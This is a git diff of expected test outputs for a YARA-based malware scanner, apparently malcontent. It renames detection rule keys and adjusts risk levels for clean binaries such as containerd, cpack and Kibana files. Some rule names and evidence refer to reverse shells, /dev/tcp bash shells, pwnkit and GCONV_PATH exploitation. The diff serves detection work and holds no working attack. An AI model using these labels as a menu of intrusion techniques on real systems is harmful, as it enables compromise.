| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!!](https://github.com/search?q=0+++++++%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!!](https://github.com/search?q=12366++++++%21%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[AGG !!](https://github.com/search?q=AGG+++++%21%21&type=code)
[CGIJMOQS !!](https://github.com/search?q=CGIJMOQS++++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[EE !!](https://github.com/search?q=EE++++%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) |
| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptorConfig](https://github.com/search?q=interceptorConfig&type=code)
[interceptorEv](https://github.com/search?q=interceptorEv&type=code)
[interceptor_config](https://github.com/search?q=interceptor_config&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) |
| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) |
@@ -101,11 +104,11 @@
| LOW | [data/encoding/json_encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-encode.yara#JSONEncode) | encodes JSON | [JSON.stringify](https://github.com/search?q=JSON.stringify&type=code) |
| LOW | [data/hash/sha1](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha1.yara#SHA1) | Uses the SHA1 signature format | [SHA1_](https://github.com/search?q=SHA1_&type=code) |
| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) |
-| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) |
-| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) |
+| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
+| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
-| LOW | [evasion/hidden_paths/relative_hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/relative-hidden.yara#relative_hidden_launcher) | relative hidden launcher | [./.691.9B](https://github.com/search?q=.%2F.691.9B&type=code)
[bash](https://github.com/search?q=bash&type=code)
[exec](https://github.com/search?q=exec&type=code)
[system](https://github.com/search?q=system&type=code) |
| LOW | [evasion/hijack_execution/LD_LIBRARY_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hijack_execution/LD_LIBRARY_PATH.yara#ld_library_path) | ld library path | [LD_LIBRARY_PATH](https://github.com/search?q=LD_LIBRARY_PATH&type=code) |
| LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
| LOW | [exec/dylib/address_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/address-check.yara#dladdr) | [determine if address belongs to a shared library](https://man7.org/linux/man-pages/man3/dladdr.3.html) | [dladdr](https://github.com/search?q=dladdr&type=code) |
@@ -136,7 +139,6 @@
| LOW | [fs/tempdir/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/tempdir/tempdir-create.yara#mkdtemp) | creates temporary directory | [mkdtemp](https://github.com/search?q=mkdtemp&type=code)
[temp dir](https://github.com/search?q=temp+dir&type=code) |
| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) |
| LOW | [hw/wireless](https://github.com/chainguard-dev/malcontent/blob/main/rules/hw/wireless.yara#bssid) | wireless network base station ID | [BSSID](https://github.com/search?q=BSSID&type=code) |
-| LOW | [impact/exploit/GCONV_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/exploit/GCONV_PATH.yara#gconv_path) | references character conversion configuration | [GCONV_PATH](https://github.com/search?q=GCONV_PATH&type=code) |
| LOW | [impact/ui/screen_capture](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/ui/screen-capture.yara#macos_screen_capture) | macos screen capture | [captureScreen](https://github.com/search?q=captureScreen&type=code) |
| LOW | [net/dns](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns.yara#go_dns_refs) | Uses DNS (Domain Name Service) | [require('dns')](https://github.com/search?q=require%28%27dns%27%29&type=code) |
| LOW | [net/dns/servers](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-servers.yara#go_dns_refs_local) | Examines local DNS servers | [resolv.conf](https://github.com/search?q=resolv.conf&type=code) |
@@ -170,7 +172,5 @@
| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) |
| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) |
| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) |
-| LOW | [process/parent_pid_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/parent_pid-get.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) |
-| LOW | [process/thread_local_storage](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/thread_local_storage.yara#tls_get_addr) | [Uses glibc thread local storage](https://chao-tic.github.io/blog/2018/12/25/tls) | [__tls_get_addr](https://github.com/search?q=__tls_get_addr&type=code) |
| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) |
diff --git a/tests/linux/clean/containerd.simple b/tests/linux/clean/containerd.simple
index 6c40382aa..74979278e 100644
--- a/tests/linux/clean/containerd.simple
+++ b/tests/linux/clean/containerd.simple
@@ -2,7 +2,7 @@
3P/threat_hunting/hijacker: medium
3P/threat_hunting/privilegeescalation: medium
c2/addr/ip: medium
-c2/server_address: medium
+c2/addr/server: medium
collect/archives/zip: medium
collect/databases/mysql: medium
credential/password: low
@@ -23,13 +23,13 @@ data/encoding/json: low
data/encoding/json_decode: low
data/hash/md5: low
discover/network/mac_address: medium
-discover/system/cpu_info: low
-discover/system/hostname_get: low
+discover/system/cpu: low
+discover/system/hostname: low
discover/system/platform: medium
discover/user/USER: low
-evasion/covert_location/dev_mqueue: medium
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/var_run: medium
+evasion/file/location/dev_mqueue: medium
+evasion/file/location/dev_shm: medium
+evasion/file/location/var_run: medium
evasion/process_injection/ptrace: medium
exec/plugin: low
exec/program: medium
@@ -94,7 +94,6 @@ net/ip/icmp: medium
net/ip/multicast_send: low
net/ip/parse: medium
net/ip/send_unicast: low
-net/ip/spoof: medium
net/resolve/hostname: low
net/socket/listen: medium
net/socket/local_addr: low
diff --git a/tests/linux/clean/cpack.md b/tests/linux/clean/cpack.md
index f81da4983..ca1168f2f 100644
--- a/tests/linux/clean/cpack.md
+++ b/tests/linux/clean/cpack.md
@@ -2,7 +2,7 @@
| RISK | KEY | DESCRIPTION | EVIDENCE |
|--------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
-| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_http_url_with_question) | contains hardcoded endpoint with a question mark | [https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) |
+| HIGH | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_url_with_question) | binary contains hardcoded URL with question mark | [https://jrsoftware.org/isinfo.php?](https://jrsoftware.org/isinfo.php?) |
| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[Ip](https://github.com/search?q=Ip&type=code)
[Port](https://github.com/search?q=Port&type=code)
[local_ip](https://github.com/search?q=local_ip&type=code)
[use_port](https://github.com/search?q=use_port&type=code) |
| MEDIUM | [crypto/file_encrypter](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/file-encrypter.yara#file_crypter) | Encrypts files | [cryptor](https://github.com/search?q=cryptor&type=code) |
| MEDIUM | [data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode) | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) |
@@ -11,7 +11,7 @@
| MEDIUM | [discover/network/interface_list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-list.yara#bsd_ifaddrs) | list network interfaces | [freeifaddrs](https://github.com/search?q=freeifaddrs&type=code)
[getifaddrs](https://github.com/search?q=getifaddrs&type=code) |
| MEDIUM | [discover/processes/list](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/processes/list.yara#ps_exec) | ps exec | [#!](https://github.com/search?q=%23%21&type=code)
[ps ax](https://github.com/search?q=ps+ax&type=code) |
| MEDIUM | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#os_release) | [operating-system identification](https://developer.apple.com/documentation/os/1524245-os_release) | [os_release](https://github.com/search?q=os_release&type=code) |
-| MEDIUM | [evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
+| MEDIUM | [evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#static_hidden_path) | possible hidden file path | [/home/linuxbrew/.linuxbrew](https://github.com/search?q=%2Fhome%2Flinuxbrew%2F.linuxbrew&type=code) |
| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [N_125cmFunctionFunctionBlocker16StartCommandNameEv](https://github.com/search?q=N_125cmFunctionFunctionBlocker16StartCommandNameEv&type=code)
[StartupCommands](https://github.com/search?q=StartupCommands&type=code)
[_N_122cmBlockFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_122cmBlockFunctionBlocker16StartCommandNameEv&type=code)
[_N_122cmMacroFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_122cmMacroFunctionBlocker16StartCommandNameEv&type=code)
[_N_124cmForEachFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_N_124cmForEachFunctionBlocker16StartCommandNameEv&type=code)
[_ZN13cmSystemTools23s_RunCommandHideConsoleE](https://github.com/search?q=_ZN13cmSystemTools23s_RunCommandHideConsoleE&type=code)
[_ZN13cmSystemTools25s_DisableRunCommandOutputE](https://github.com/search?q=_ZN13cmSystemTools25s_DisableRunCommandOutputE&type=code)
[_ZNK19cmIfFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_ZNK19cmIfFunctionBlocker16StartCommandNameEv&type=code)
[_ZNK22cmWhileFunctionBlocker16StartCommandNameEv](https://github.com/search?q=_ZNK22cmWhileFunctionBlocker16StartCommandNameEv&type=code)
[_ZZN12_GLOBAL__N_117TryRunCommandImpl18DoNotRunExecutableERKNSt7_](https://github.com/search?q=_ZZN12_GLOBAL__N_117TryRunCommandImpl18DoNotRunExecutableERKNSt7_&type=code)
[cmExecuteCommand](https://github.com/search?q=cmExecuteCommand&type=code) |
| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) |
| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execall) | executes external programs | [execvp](https://github.com/search?q=execvp&type=code) |
@@ -30,6 +30,7 @@
| MEDIUM | [fs/proc/meminfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/meminfo.yara#proc_meminfo_val) | get memory info | [/proc/meminfo](https://github.com/search?q=%2Fproc%2Fmeminfo&type=code) |
| MEDIUM | [fs/proc/self_exe](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/proc/self-exe.yara#proc_self_exe) | gets executable associated to this process | [/proc/self/exe](https://github.com/search?q=%2Fproc%2Fself%2Fexe&type=code) |
| MEDIUM | [impact/remote_access/crypto_listen_socks](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/crypto_listen_socks.yara#socks_crypto_listener) | socks crypto listener | [SOCKS5](https://github.com/search?q=SOCKS5&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socks5](https://github.com/search?q=socks5&type=code) |
+| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [%d.%d.%d.%d](https://github.com/search?q=%25d.%25d.%25d.%25d&type=code)
[Port](https://github.com/search?q=Port&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) |
| MEDIUM | [net/dns/over_https](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-over-https.yara#doh_refs) | Supports DNS (Domain Name Service) over HTTPS | [application/dns-message](https://github.com/search?q=application%2Fdns-message&type=code) |
| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/download.yara#download) | download files | [CPACK_DOWNLOAD_ALL](https://github.com/search?q=CPACK_DOWNLOAD_ALL&type=code)
[CPACK_DOWNLOAD_SITE](https://github.com/search?q=CPACK_DOWNLOAD_SITE&type=code)
[CPACK_IFW_DOWNLOAD_ALL](https://github.com/search?q=CPACK_IFW_DOWNLOAD_ALL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_COUNT_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_HASHES_INTERNAL&type=code)
[CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL](https://github.com/search?q=CPACK_INNOSETUP_DOWNLOAD_URLS_INTERNAL&type=code)
[CPACK_USES_DOWNLOAD](https://github.com/search?q=CPACK_USES_DOWNLOAD&type=code)
[Call DownloadFile](https://github.com/search?q=Call+DownloadFile&type=code)
[DOWNLOAD HASH mismatch](https://github.com/search?q=DOWNLOAD+HASH+mismatch&type=code)
[DOWNLOAD cannot set TLS](https://github.com/search?q=DOWNLOAD+cannot+set+TLS&type=code)
[DOWNLOAD cannot set http](https://github.com/search?q=DOWNLOAD+cannot+set+http&type=code)
[DOWNLOAD cannot set url](https://github.com/search?q=DOWNLOAD+cannot+set+url&type=code)
[DOWNLOAD cannot set user](https://github.com/search?q=DOWNLOAD+cannot+set+user&type=code)
[DOWNLOAD error](https://github.com/search?q=DOWNLOAD+error&type=code)
[DOWNLOAD missing ALGO](https://github.com/search?q=DOWNLOAD+missing+ALGO&type=code)
[DOWNLOAD missing VAR for](https://github.com/search?q=DOWNLOAD+missing+VAR+for&type=code)
[Maxdownload](https://github.com/search?q=Maxdownload&type=code)
[VERIFY_DOWNLOADS](https://github.com/search?q=VERIFY_DOWNLOADS&type=code)
[_DOWNLOADED](https://github.com/search?q=_DOWNLOADED&type=code)
[completely downloaded](https://github.com/search?q=completely+downloaded&type=code)
[compute hash on downloaded file](https://github.com/search?q=compute+hash+on+downloaded+file&type=code)
[cw_download_write](https://github.com/search?q=cw_download_write&type=code)
[download_write body](https://github.com/search?q=download_write+body&type=code)
[download_write header](https://github.com/search?q=download_write+header&type=code)
[for the URL download method](https://github.com/search?q=for+the+URL+download+method&type=code)
[hash on failed download](https://github.com/search?q=hash+on+failed+download&type=code)
[is already downloaded](https://github.com/search?q=is+already+downloaded&type=code)
[isDownloaded](https://github.com/search?q=isDownloaded&type=code)
[maxdownload](https://github.com/search?q=maxdownload&type=code)
[partial download completed](https://github.com/search?q=partial+download+completed&type=code)
[protected CPackDownloadArchives](https://github.com/search?q=protected+CPackDownloadArchives&type=code)
[protected CPackDownloadComponents](https://github.com/search?q=protected+CPackDownloadComponents&type=code)
[protected CPackDownloadCount](https://github.com/search?q=protected+CPackDownloadCount&type=code)
[protected CPackDownloadHashes](https://github.com/search?q=protected+CPackDownloadHashes&type=code)
[protected CPackDownloadUrls](https://github.com/search?q=protected+CPackDownloadUrls&type=code)
[skipping download as file already](https://github.com/search?q=skipping+download+as+file+already&type=code)
[t resume download](https://github.com/search?q=t+resume+download&type=code) |
| MEDIUM | [net/download/fetch](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download/fetch.yara#curl_value) | Invokes curl to download a file | [curl due to a build-time decision.](https://github.com/search?q=curl+due+to+a+build-time+decision.&type=code)
[curl function was given a bad argument](https://github.com/search?q=curl+function+was+given+a+bad+argument&type=code)
[curl is built without the HTTPS-proxy support.](https://github.com/search?q=curl+is+built+without+the+HTTPS-proxy+support.&type=code)
[curl lacks IDN support](https://github.com/search?q=curl+lacks+IDN+support&type=code)
[curl offers](https://github.com/search?q=curl+offers&type=code)
[curl understands](https://github.com/search?q=curl+understands&type=code)
[curl user interface](https://github.com/search?q=curl+user+interface&type=code) |
@@ -56,8 +57,8 @@
| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [MD5_Final](https://github.com/search?q=MD5_Final&type=code)
[MD5_Init](https://github.com/search?q=MD5_Init&type=code)
[MD5_Update](https://github.com/search?q=MD5_Update&type=code) |
| LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) |
| LOW | [data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand) | [generate random numbers insecurely](https://man.openbsd.org/rand) | [srand](https://github.com/search?q=srand&type=code) |
-| LOW | [discover/network/interface_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface-get.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) |
-| LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
+| LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) |
+| LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) |
| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
| LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
[getenv](https://github.com/search?q=getenv&type=code) |
diff --git a/tests/linux/clean/default_config.json.simple b/tests/linux/clean/default_config.json.simple
index 92c43b7f1..4d372b2a0 100644
--- a/tests/linux/clean/default_config.json.simple
+++ b/tests/linux/clean/default_config.json.simple
@@ -20,16 +20,16 @@ data/compression/bzip2: low
data/compression/lzma: low
data/compression/zstd: low
data/encoding/base64: low
-discover/system/network: high
+discover/multiple: medium
+discover/system/dmesg: low
discover/system/platform: low
discover/user/name_get: medium
evasion/bypass_security/linux/iptables: medium
evasion/bypass_security/linux/ufw: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
evasion/logging/acct: low
evasion/process_injection/readelf: medium
exec/plugin: low
-exec/shell/bash_dev_tcp: high
exec/shell/bash_dev_udp: medium
exec/shell/nohup: medium
exec/system_controls/apparmor: medium
@@ -55,6 +55,7 @@ impact/exploit/cve: medium
impact/remote_access/iptables: medium
net/dns/servers: low
net/download: medium
+net/ftp/t: low
net/http/cookies: medium
net/socket/connect: medium
net/tcp/sftp: medium
diff --git a/tests/linux/clean/emscripten.sh.simple b/tests/linux/clean/emscripten.sh.simple
index c52f451b3..08f914c03 100644
--- a/tests/linux/clean/emscripten.sh.simple
+++ b/tests/linux/clean/emscripten.sh.simple
@@ -1,6 +1,6 @@
# linux/clean/emscripten.sh: medium
c2/tool_transfer/shell: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
fs/file/delete: medium
fs/file/delete_forcibly: low
fs/file/make_executable: medium
diff --git a/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple b/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple
index e5fa47d26..da76501a0 100644
--- a/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple
+++ b/tests/linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json.simple
@@ -1,7 +1,7 @@
# linux/clean/kibana/3728c08d-9b70-456b-b6b8-007c7d246128_5.json: high
-evasion/covert_location/dev_shm: medium
-evasion/hidden_paths/dev_shm: low
-evasion/hidden_paths/hidden: high
+evasion/file/location/dev_shm: medium
+evasion/file/prefix: high
+evasion/file/prefix/dev: low
exec/shell/command: medium
fs/path/etc: low
fs/path/etc_initd: medium
diff --git a/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple b/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple
index 2fcc182fe..43b73b57d 100644
--- a/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple
+++ b/tests/linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json.simple
@@ -1,7 +1,6 @@
# linux/clean/kibana/8da41fc9-7735-4b24-9cc6-c78dfc9fc9c9_108.json: medium
3P/threat_hunting/seclists: medium
impact/exploit: medium
-impact/exploit/GCONV_PATH: low
impact/exploit/cve: medium
impact/exploit/pwnkit: low
impact/remote_access/agent: medium
diff --git a/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple b/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple
index c1ebf94c1..ee2b6461a 100644
--- a/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple
+++ b/tests/linux/clean/kibana/cde1bafa-9f01-4f43-a872-605b678968b0_111.json.simple
@@ -52,7 +52,7 @@ exec/shell/command: medium
exec/shell/power: medium
exfil/collection: medium
impact/infection/infected: medium
-impact/remote_access/backdoor: high
+impact/remote_access/backdoor: medium
impact/remote_access/implant: medium
impact/remote_access/reverse_shell: high
net/dns/txt: low
diff --git a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
index 7628d3546..cb294eb02 100644
--- a/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
+++ b/tests/linux/clean/kibana/securitySolution.chunk.9.js.simple
@@ -52,7 +52,10 @@ data/encoding/json_decode: low
data/encoding/json_encode: low
data/hash/md5: low
discover/network/mac_address: medium
-evasion/hidden_paths/hidden: medium
+discover/process/name: medium
+discover/process/parent: low
+evasion/file/prefix: medium
+evasion/rootkit/refs: medium
exec/cmd: medium
exec/plugin: low
exec/shell/power: medium
